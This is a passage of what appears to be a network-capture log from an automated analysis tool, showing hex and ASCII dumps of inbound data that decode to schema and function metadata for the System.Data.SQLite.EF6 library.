20 00 41 00 53 00 43 00 00 05 28 Data Ascii: r STRFTIME argumentCHARINDEXRANDOMBLOB(16)LENGTH(ROUND(, 0)TRIM(SUBSTR(, 1, , -(), LOWERUPPER COLLATE DESC ASC(
2023-11-18 09:02:36 UTC	471	IN	Data Raw: 12 79 01 12 81 ad 07 15 12 79 01 12 81 ad 0a 20 00 15 12 81 7d 01 12 81 b1 0f 07 03 15 12 5d 01 12 81 b1 12 81 b1 12 81 b1 08 15 12 81 71 01 12 81 b1 07 15 12 5d 01 12 81 b1 05 00 02 02 0e 0e 0d 07 03 15 12 5d 01 12 81 b1 12 81 b1 02 08 15 12 81 7d 01 12 81 b1 07 20 02 02 0e 11 82 b5 04 07 01 12 24 05 00 00 12 82 7d 06 20 01 0e 12 82 bd 05 15 12 51 01 1c 0c 07 04 15 11 81 69 01 1c 1c 0e 12 10 06 15 11 81 69 01 1c 04 20 01 01 03 0a 20 00 15 12 81 2d 01 12 80 89 04 07 02 02 02 0a 20 00 15 12 81 2d 01 12 80 b5 03 07 01 02 05 20 00 12 81 75 05 20 00 12 81 31 0a 20 00 15 12 81 2d 01 12 81 29 0a 20 00 15 12 81 2d 01 12 81 15 07 15 12 6c 01 12 81 29 05 20 02 01 1c 18 05 0a 01 12 81 29 0c 30 01 01 1e 00 15 12 81 bd 01 1e 00 03 0a 01 02 07 15 12 6c 01 12 80 b5 05 Data Ascii: yy }]q]]} $} Qii - - u 1 -) -l) )0l
2023-11-18 09:02:36 UTC	473	IN	Data Raw: 15 12 79 01 12 82 5d 05 20 00 11 81 b9 04 06 12 83 31 04 20 00 13 01 05 20 00 12 83 35 06 20 01 08 12 80 95 06 15 12 51 01 12 55 07 15 11 81 69 01 12 55 04 20 01 08 1c 13 07 06 15 11 82 3d 01 08 12 80 95 11 81 b5 02 11 80 9d 02 07 00 01 12 81 f9 11 7d 05 20 02 01 0e 1c 05 20 00 11 81 b5 06 20 01 01 11 81 b5 05 20 00 11 80 9d 06 20 01 01 11 80 9d 06 15 11 82 3d 01 08 09 07 02 08 15 11 82 3d 01 08 07 07 03 11 80 9d 02 02 0e 07 05 1d 0e 12 82 4d 08 12 82 4d 12 82 51 08 20 02 12 82 4d 0e 1d 0e 05 20 00 12 83 41 06 20 01 12 82 4d 0e 05 20 00 12 82 51 23 07 0d 12 59 12 82 61 12 82 51 12 82 4d 0e 11 82 65 12 81 8d 12 82 69 11 80 9d 0e 12 81 89 12 82 6d 1d 1c 04 20 01 0e 0e 09 20 03 12 59 12 82 bd 0e 1c 05 20 00 11 82 65 05 20 00 12 83 49 08 00 01 11 80 9d 12 81 Data Ascii: y] 1 5 QUiU =} ==MMQ M A M Q#YaQMeim Y e I
2023-11-18 09:02:36 UTC	477	IN	Data Raw: 69 73 20 74 79 70 65 20 6f 66 20 6d 65 74 68 6f 64 20 61 63 72 6f 73 73 20 4e 47 65 6e 20 69 6d 61 67 65 20 62 6f 75 6e 64 61 72 69 65 73 00 00 40 01 00 3b 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 45 46 36 2e 4b 65 79 54 6f 4c 69 73 74 4d 61 70 60 32 2b 3c 45 6e 75 6d 65 72 61 74 65 56 61 6c 75 65 73 3e 64 5f 5f 35 00 00 3f 01 00 3a 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 45 46 36 2e 4b 65 79 54 6f 4c 69 73 74 4d 61 70 60 32 2b 3c 67 65 74 5f 41 6c 6c 56 61 6c 75 65 73 3e 64 5f 5f 31 31 00 00 04 01 00 00 00 40 01 00 33 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 54 6f 6f 6c 73 2e 53 74 72 6f 6e 67 6c 79 54 79 70 65 64 52 65 73 6f 75 72 63 65 42 75 69 6c 64 65 72 07 34 2e 30 2e 30 2e 30 00 00 e8 07 00 00 ce ca ef be Data Ascii: is type of method across NGen image boundaries@;System.Data.SQLite.EF6.KeyToListMap`2+<EnumerateValues>d__5?:System.Data.SQLite.EF6.KeyToListMap`2+<get_AllValues>d__11@3System.Resources.Tools.StronglyTypedResourceBuilder4.0.0.0
2023-11-18 09:02:36 UTC	481	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 43 61 74 61 6c 6f 67 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 54 41 42 4c 45 5f 53 43 48 45 4d 41 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 53 63 68 65 6d 61 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 54 41 42 4c 45 5f 4e 41 4d 45 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 56 49 45 57 5f 44 45 46 49 4e 49 54 49 4f 4e 20 20 20 20 20 20 20 20 20 20 20 5b 56 69 65 77 44 65 66 69 6e 69 74 69 6f 6e 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 49 53 5f 55 50 44 41 54 41 42 4c 45 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 49 73 55 70 64 61 74 61 62 6c 65 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 Data Ascii: [CatalogName] , TABLE_SCHEMA [SchemaName] , TABLE_NAME [Name] , VIEW_DEFINITION [ViewDefinition] , IS_UPDATABLE [IsUpdatable] FROM TEMP
2023-11-18 09:02:36 UTC	485	IN	Data Raw: 41 53 45 20 5b 50 61 72 65 6e 74 49 64 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 43 4f 4e 53 54 52 41 49 4e 54 5f 4e 41 4d 45 20 5b 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 43 4f 4e 53 54 52 41 49 4e 54 5f 54 59 50 45 20 5b 43 6f 6e 73 74 72 61 69 6e 74 54 79 70 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 49 53 5f 44 45 46 45 52 52 41 42 4c 45 20 5b 49 73 44 65 66 65 72 72 61 62 6c 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 49 4e 49 54 49 41 4c 4c 59 5f 44 45 46 45 52 52 45 44 20 5b 49 73 49 6e 69 74 69 61 6c 6c 79 44 65 66 65 72 72 65 64 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 2e 53 43 48 45 4d 41 43 4f 4e 53 54 52 41 49 4e 54 53 20 74 63 0a 20 20 20 20 20 20 3c 2f 44 65 66 69 6e 69 6e Data Ascii: ASE [ParentId] , tc.CONSTRAINT_NAME [Name] , tc.CONSTRAINT_TYPE [ConstraintType] , tc.IS_DEFERRABLE [IsDeferrable] , tc.INITIALLY_DEFERRED [IsInitiallyDeferred] FROM TEMP.SCHEMACONSTRAINTS tc </Definin
2023-11-18 09:02:36 UTC	489	IN	Data Raw: 6e 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 56 69 65 77 56 69 65 77 43 6f 6c 75 6d 6e 22 20 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 50 61 72 65 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 73 22 2f 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6c 75 6d 6e 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6c 75 6d 6e 73 22 2f 3e 0a 20 20 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 3c Data Ascii: ns" Association="Self.ViewViewColumn" > <End Role="Parent" EntitySet="SViews"/> <End Role="Column" EntitySet="SViewColumns"/> </AssociationSet> <AssociationSet Name="SViewViewConstraints" Association="Self.ViewViewConstraint" > <
2023-11-18 09:02:36 UTC	494	IN	Data Raw: 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4e 75 6c 6c 61 62 6c 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 62 69 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 Data Ascii: <Property Name="IsNullable" Nullable="false" Type="bit" /> <Property Name="TypeName" Nullable="false" Type="nvarchar" /> <Property Name="MaxLength" Type="int" /> <Property Name="Precision" Type="int" /> <Property Name="DateTimePrecision"
2023-11-18 09:02:36 UTC	498	IN	Data Raw: 54 79 70 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 3c 4b 65 79 3e 0a 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 3c 2f 4b 65 79 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 45 78 70 72 65 73 73 69 6f 6e 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 74 72 75 Data Ascii: Type" Nullable="false" Type="nvarchar" /> </EntityType> <EntityType Name="CheckConstraint"> <Key> <PropertyRef Name="Id" /> </Key> <Property Name="Id" Nullable="false" Type="nvarchar" /> <Property Name="Expression" Nullable="tru
2023-11-18 09:02:36 UTC	500	IN	Data Raw: 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 46 6f 72 65 69 67 6e 4b 65 79 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6e 73 74 72 61 69 6e 74 22 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 20 20 3c 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 Data Ascii: rentialConstraint> </Association> <Association Name="ConstraintForeignKey"> <End Type="Self.ForeignKeyConstraint" Role="Constraint" Multiplicity="1" /> <End Type="Self.ForeignKey" Role="ForeignKey" Multiplicity="*" /> <ReferentialConstrai
2023-11-18 09:02:36 UTC	503	IN	Data Raw: 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 50 72 69 6e 63 69 70 61 6c 3e 0a 20 20 20 20 20 20 3c 44 65 70 65 6e 64 65 6e 74 20 52 6f 6c 65 3d 22 50 61 72 61 6d 65 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 50 61 72 65 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 44 65 70 65 6e 64 65 6e 74 3e 0a 20 20 20 20 3c 2f 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 Data Ascii: <PropertyRef Name="Id" /> </Principal> <Dependent Role="Parameter"> <PropertyRef Name="ParentId" /> </Dependent> </ReferentialConstraint> </Association> <Association Name="ViewViewConstraint"> <End Type="Self.Vi
2023-11-18 09:02:36 UTC	506	IN	Data Raw: 65 3d 22 54 61 62 6c 65 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6e 73 74 72 61 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 54 61 62 6c 65 46 6f 72 65 69 67 6e 4b 65 79 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 2f 3e 0a 20 20 20 20 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 56 69 65 77 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 65 77 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 56 69 65 77 43 6f 6c 75 6d 6e 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6c 75 6d 6e 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 74 69 74 Data Ascii: e="TableConstraints" EntityType="Self.Constraint" /> <EntitySet Name="TableForeignKeys" EntityType="Self.ForeignKey" /> <EntitySet Name="Views" EntityType="Self.View" /> <EntitySet Name="ViewColumns" EntityType="Self.Column" /> <Entit
2023-11-18 09:02:36 UTC	510	IN	Data Raw: 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6c 6c 61 74 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 68 61 72 61 63 74 65 72 53 65 74 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 65 6c 66 2e 43 68 61 72 61 63 74 65 72 53 65 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4d 75 6c 74 69 53 65 74 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 42 6f 6f 6c 65 61 6e 22 2f 3e 0a 20 20 3c 2f 43 6f 6d 70 6c 65 78 54 79 70 65 3e 0a 0a 20 20 3c 43 6f 6d 70 6c 65 78 54 79 70 65 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 Data Ascii: Nullable="false" Type="Self.Collation" /> <Property Name="CharacterSet" Nullable="false" Type="Self.CharacterSet" /> <Property Name="IsMultiSet" Nullable="false" Type="Boolean"/> </ComplexType> <ComplexType Name="Collation"> <Property Na
2023-11-18 09:02:36 UTC	514	IN	Data Raw: 61 6d 65 3d 22 50 61 72 65 6e 74 22 20 46 72 6f 6d 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 54 6f 52 6f 6c 65 3d 22 50 61 72 65 6e 74 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 22 20 42 61 73 65 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 45 78 70 72 65 73 73 69 6f 6e 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 20 20 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 54 61 62 6c 65 4f 72 56 69 65 77 43 6f 6c Data Ascii: ame="Parent" FromRole="Constraint" ToRole="Parent" /> </EntityType> <EntityType Name="CheckConstraint" BaseType="Self.Constraint"> <Property Name="Expression" Nullable="false" Type="String" /> </EntityType> <EntityType Name="TableOrViewCol
2023-11-18 09:02:36 UTC	518	IN	Data Raw: 3c 54 79 70 65 20 4e 61 6d 65 3d 22 64 65 63 69 6d 61 6c 22 20 50 72 69 6d 69 74 69 76 65 54 79 70 65 4b 69 6e 64 3d 22 44 65 63 69 6d 61 6c 22 3e 0a 20 20 20 20 20 20 3c 46 61 63 65 74 44 65 73 63 72 69 70 74 69 6f 6e 73 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 65 63 69 73 69 6f 6e 20 4d 69 6e 69 6d 75 6d 3d 22 31 22 20 4d 61 78 69 6d 75 6d 3d 22 35 33 22 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 31 38 22 20 43 6f 6e 73 74 61 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 53 63 61 6c 65 20 4d 69 6e 69 6d 75 6d 3d 22 30 22 20 4d 61 78 69 6d 75 6d 3d 22 35 33 22 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 30 22 20 43 6f 6e 73 74 61 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 46 61 63 65 74 44 65 73 63 72 69 70 Data Ascii: <Type Name="decimal" PrimitiveTypeKind="Decimal"> <FacetDescriptions> <Precision Minimum="1" Maximum="53" DefaultValue="18" Constant="false" /> <Scale Minimum="0" Maximum="53" DefaultValue="0" Constant="false" /> </FacetDescrip
2023-11-18 09:02:36 UTC	520	IN	Data Raw: 74 72 69 6e 67 22 3e 0a 20 20 20 20 20 20 3c 46 61 63 65 74 44 65 73 63 72 69 70 74 69 6f 6e 73 3e 0a 20 20 20 20 20 20 20 20 3c 4d 61 78 4c 65 6e 67 74 68 20 4d 69 6e 69 6d 75 6d 3d 22 31 22 20 4d 61 78 69 6d 75 6d 3d 22 32 31 34 37 34 38 33 36 34 37 22 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 32 31 34 37 34 38 33 36 34 37 22 20 43 6f 6e 73 74 61 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 55 6e 69 63 6f 64 65 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 74 72 75 65 22 20 43 6f 6e 73 74 61 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 46 69 78 65 64 4c 65 6e 67 74 68 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 74 72 75 65 22 20 43 6f 6e 73 74 61 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c Data Ascii: tring"> <FacetDescriptions> <MaxLength Minimum="1" Maximum="2147483647" DefaultValue="2147483647" Constant="false" /> <Unicode DefaultValue="true" Constant="true" /> <FixedLength DefaultValue="true" Constant="true" /> <
2023-11-18 09:02:36 UTC	524	IN	Data Raw: 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 41 58 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 54 69 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 54 69 6d 65 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 41 58 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 61 74 65 Data Ascii: <Function Name="MAX" Aggregate="true" BuiltIn="true"> <ReturnType Type="Time" /> <Parameter Name="arg" Type="Collection(Time)" Mode="In" /> </Function> <Function Name="MAX" Aggregate="true" BuiltIn="true"> <ReturnType Type="Date
2023-11-18 09:02:36 UTC	528	IN	Data Raw: 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 44 6f 75 62 6c 65 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 45 4e 44 20 41 47 47 52 45 47 41 54 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 2d 2d 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 42 65 67 69 6e 20 53 63 61 6c 61 72 73 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 71 6c 69 74 65 2e 6f 72 67 2f 6c 61 6e 67 5f 63 6f 72 65 66 75 6e 63 2e 68 74 6d 6c 20 2d 2d 3e 0a 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d Data Ascii: uble" /> <Parameter Name="arg" Type="Collection(Double)" Mode="In" /> </Function> ... END AGGREGATES ############################################# --> ... Begin Scalars https://www.sqlite.org/lang_corefunc.html --> <Function Nam
2023-11-18 09:02:36 UTC	533	IN	Data Raw: 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d Data Ascii: ame="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Name="str" Type="String" Mode="In" /> </Function> <Function Name="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Name="str" Type="String" M
2023-11-18 09:02:36 UTC	534	IN	Data Raw: 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 54 61 72 67 65 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 53 65 61 72 63 68 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 52 65 70 6c 61 63 65 6d 65 6e 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d Data Ascii: e"> <ReturnType Type="String" /> <Parameter Name="strTarget" Type="String" Mode="In" /> <Parameter Name="strSearch" Type="String" Mode="In" /> <Parameter Name="strReplacement" Type="String" Mode="In" /> </Function> ...
2023-11-18 09:02:36 UTC	538	IN	Data Raw: 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6e 75 6d 62 65 72 22 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 74 69 6d 65 22 20 54 79 70 65 3d 22 54 69 6d 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 44 41 54 45 41 44 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 61 74 65 54 69 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 Data Ascii: Mode="In" /> <Parameter Name="number" Type="Double" Mode="In" /> <Parameter Name="time" Type="Time" Mode="In" /> </Function> <Function Name="DATEADD" BuiltIn="true"> <ReturnType Type="DateTime" /> <Parameter Name="datepart"
2023-11-18 09:02:36 UTC	540	IN	Data Raw: 6e 20 4e 61 6d 65 3d 22 44 41 54 45 44 49 46 46 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 61 72 74 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 65 6e 64 64 61 74 65 22 20 54 79 70 65 3d 22 44 61 74 65 54 69 6d 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 